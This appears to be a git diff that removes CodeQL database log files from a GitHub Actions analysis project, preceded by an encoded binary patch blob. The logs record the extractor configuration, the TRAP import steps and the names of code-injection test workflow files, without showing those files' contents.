z?go#6x8fql=_S^0g)cQvhR2$Tg{U(EE0^g*-y zaAty^58%hF%MUdj>?8OIv-~`1rkA8oo8^Z(4t_p`pR+DMFPQ%W&o|4@0`uqaKg{w& zjRrp};Ww?z5BUoAHB2sou~#YU47N7>zIk1kxP!HWKQXTde`anEe_`Gj#&581;QyI5 z?{{X+`@MNn_(yZAR4OOtj&Q~NI9xSv3D?c5;ATNz!_1uJH4FM$=5NtiTQK=yZNV18 ztS8hz`75t)eKEX&c?rzgf^7|NW@cSwVhzUn%3GK@k7bXW_&T25_r>mJWQsztsBbVj9&0S#5RWP0__kucbamLHNqpY9B z$_GSFQuvqF@mKBxYYpAuyr(Jt!#qBNSz9p0bEH}E42-Pr&gH?@_l1vzIcrG`KEb+t zy1yk2c&PO$@UY1Gu3bLWy5<^gojos~Y1UjLJw|hlf;HFA;Jl}4t_wU~Jlf+m*BI-X zEAMHV>oV(Y;VaD4QJFInYzLS%%Mxm;d~IZXc9*Y*6$59ae3Ny}J0WuNb9kb4#W2ab zVwh}QHE_F`e3uy)O#6FR#AHL5`jF}8iSoVXP2lO~P2mS3>u2He4C~ZHd8T#EHOsoz zKHIwHdc-<4UVaRwHj*vjxgH~*PkGF?@I32U*E80&u4k<)KhML;&vx)j*5zlR$1Arl zTbG|j*5&6_>+JM`#an(I?Y zbLs5-*ShBVB689V{>r-M`o{WRFuf_5=2~rCb8+Tn33FAF$f}=88P;4q;Jm*vSH=A; z=?&-ojhd{i6Q9-3YL)fu=OCCmlO>$>3N;ao`mLxR$To)ASDAjEt85)vKOa@t%U~^- 
zeF{eWl}-_pKJZSk>Y*>Zi}ikRXX^*UtWB023hx0hcXAj^zJf7lrH5H->=`*Z99Hj= zQJ)poEK81ne;HZzTp^BN#8_d?!8D$^Wyw)6a|dJJEB(#HSYeJ}>_vrf!L%1gL&_07 zvobi!>Y0^eBPaZS8cP>-1mpJrCf!_Cv+GtJ8F$jHeW@F?r| z!RMM4|M_O}RG~(K?F(N7sb-FWe`}pOtmJ)+*eh39R}9pFOh12D#zhXbcMU8*$D?0o zU9sI5Ibp4po6IM|6U>TvqQ@)dN!EW2v;N?dd{pl77}YK7m+5Ev3eN;nP2O)F2G207 zCTE&k@GP_H=V7z*@Mz@Z40ujKpKG0bSDv%37+$b`Hay?DVpwQa46m3K!(wv_USd`Z zOU;VmpOHfhZx{4;tt*E23;Ks<(pJ=uAsNKJ{o<)f=+xgyl8TmiG;<#eGBXd$J=vhO?Osw4dwYLDoCM$6CJucHc-iPZ{SY znDWdy31@_}m7QW;bDb7h?~O9*Bber*hGYq6E*lY9@2|2^k@apVqi$pgXEDqBhUVgY zhq-QpFV+Z5bGdKm{ZmHXgK4fSA|}cwc@L(!$d@d+111-;1K@e)F7V&Y)I#>0`3U$Wv(~uKd^G&BS@~QPIr$6xs&&ov znt3q%rdfWLc|7aLmRpyfcdXBbS6G*y_pGzl>;vnH`QO$x?@ObiH{h66H zR$0GH?-Z-vdI{%R}3#&|1V6v2GbfB znp-e65o|0>9mw>4y1K;t1cHLX*7 zwKXEE_G)Wdr#5PBBkO&6ZC&f+t+t-I1+Q-=w%SH!_P4f4WcBJA&inn>ubS1 ztZRJF$m*H3Ue-0fH>|v^1NXBopNE+Hz=xTY&%@1q;iJr)<=P-KK5ECAmFE-9_^1sv zE6>BsE%;Qk<~`lqA3npZ{Esv%&+0R>0dU@Dl;`uKtiMO7v8G_uN$nD|{9kJ3%+@Y9 zD?e984tsQ!bidi*T-ChPJu!TM}?qILP1Wc?v{vUSD$d+VyDJ78)c zZ4cjNUA1v{)I)9LJxaAP-MVVyfjC}$xHiK)1fFSDY{V)HH9&m9R09t~s(}sQC!?&- z&DztE_4}V1brVc``mA{v{DN6~I^W!a7nrqoub4I0;>fA|xaWlPyVN>otM*o5{M**$ z|6c{&eMY}`s?no^$v-_;mTm#-dy7o^%804r`8smY>0dJaKB~4la?pQ>obFI6)oa$t zNxfm6b6Ia=owd~S-a=05ZLJe?eI0WPZf7Qj`p?b8R^KqPa#H7+VA40UPEP8q=O>*S zk)`ra+`%+nJp@xu>ckgJ`YsWbllpE2eGlu3r+Y!)+d97MJReMc_A?KM4>Bt!{_c@> zh7Yx_wG1#TCr6qU^FVV89%NPwL(H1%c=HJO*9HA#^I7Pp6?9^fg&gusF!?zf_Ftn|ktr`_PW1^p@Od!s*7(0$(1 z9_TL?^p_&1`=GyE&=*)_3*#cOK7Yeck6;KbtiCXsHFK{s%d1RL%6vMm=(RAk6c@wt?4(sL%RFe)hY- zKKuF{Y545xv%cZ8uh05Md!FSCtDiUA2a-APhSr~eThYIMAJm{0W%`|SWAn(`-^P~k zh3I|YZLMqkc9B!gXk&-M_#HjIAG*)JJ}(-3dW`&ZH6|3l3@ z*BEA2PEL&+_T_Zzn(GYnV0ffienxrxEchJj@^hZ`+3*F{v|V?AJ}^A?Op#ifv+KeZDs)Sy!D*hE*pUz*DSi zjd}kW0#CIrKlelq^)t=7{M-l2Pk)&81XGULM7WKav(j8MvV1nzvVJn$F0%e^ ztGT|%uwPB;CRhvJ$UFt!B(mP&H2J?^rqTatXH@D8-HMxRmUiYhneQxezomy(L zAF`A)+T6oD9PSob?_`?$L{@Ka_A(EHslQ-~`9O0E&ij&L=x1FqxEJYfVVcxXFzN0^ z=}4IU`$-=hF+CfdJ@`pK!TKolp#`0oWa)3vSx+$eKO>_4)~3lEKj}O#OV33=FLKx; 
z_Zj^?PV;i>oZse^@K$_|C?{7%J-rCNx}aZceGED^CrdAe#{>DZzmtl73Hr@Iu1^Yb z_*jhM#+^Q_Ib1)``7&ADsJt!1`G9Kbu)clXIx|Ncvl$ z=7Ui$Y408}D~HrsFxAF9vvNW`$-n-FsQGNvL!8fBXWh*gtzQZ+Fq4Dk%Z2faJbnWD ztJbxy*Ua?V<{M_M>rIcp1zsL?^|a=@9z*_`@0qnnA9(!j@W Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. 
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml. 
-[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - }, - "python_executable_name" : { - "title" : "Controls the name of the Python executable used by the Python extractor.", - "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. 
Use this setting with caution, the Python extractor requires Python 3 to run.\n", - "type" : "string", - "pattern" : "^(py|python|python3)$" - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the extractor. 
The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 -[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. 
-[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms). -[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml. -[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. -[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. -[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor. -[2024-03-01 13:05:58] Plumbing command codeql database init completed. -[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: [] -[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh. 
-[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh] -[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] -[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed. -[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db... 
-[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml -[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist -[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings -[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear. -[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594 -[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything. 
-[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml -[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB) -[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files -[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27) -[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27) -[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27) -[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27) -[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27) -[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27) -[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27) -[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27) -[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27) -[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27) -[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27) -[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27) -[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27) -[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27) -[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27) -[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27) -[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27) -[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27) -[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27) -[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27) -[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27) -[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27) -[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27) -[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27) -[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27) -[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 
of 27) -[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27) -[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations -[2024-03-01 13:05:59] Merging 1 fragment for 'files'. -[2024-03-01 13:05:59] Merged 208 bytes for 'files'. -[2024-03-01 13:05:59] Merging 1 fragment for 'folders'. -[2024-03-01 13:05:59] Merged 128 bytes for 'folders'. -[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'. -[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'. -[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'. -[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'. -[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'. -[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'. -[2024-03-01 13:05:59] Merged 11128 bytes (10.87 KiB) for 'yaml_locations'. -[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-03-01 13:05:59] Saving string and id pools to disk. -[2024-03-01 13:05:59] Finished importing TRAP files. -[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data. -[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s) -[2024-03-01 13:05:59] String pool size: 2.06 MiB -[2024-03-01 13:05:59] ID pool size: 1.08 MiB -[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB). -[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-03-01 13:05:59] The disk cache is freshly trimmed; leave it be. -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Plumbing command codeql dataset import completed. 
-[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms). -[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms). -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). -[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml -[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml. -[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim. -[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313 -[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache. -[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2 -[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be. -[2024-03-01 13:06:00] Unpausing evaluation -[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. 
-[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml -[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms). -[2024-03-01 13:06:00] Plumbing command codeql dataset cleanup completed. -[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0. -[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB). -[2024-03-01 13:06:00] Plumbing command codeql database finalize completed. -[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:06:00] Terminating normally. diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log deleted file mode 100644 index e204c6df37d..00000000000 --- a/db/log/database-index-files-20240301.130558.974.log +++ /dev/null 
@@ -1,44 +0,0 @@ -[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Log file was started late. -[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. -[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1... 
-[2024-03-01 13:05:59] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml", - 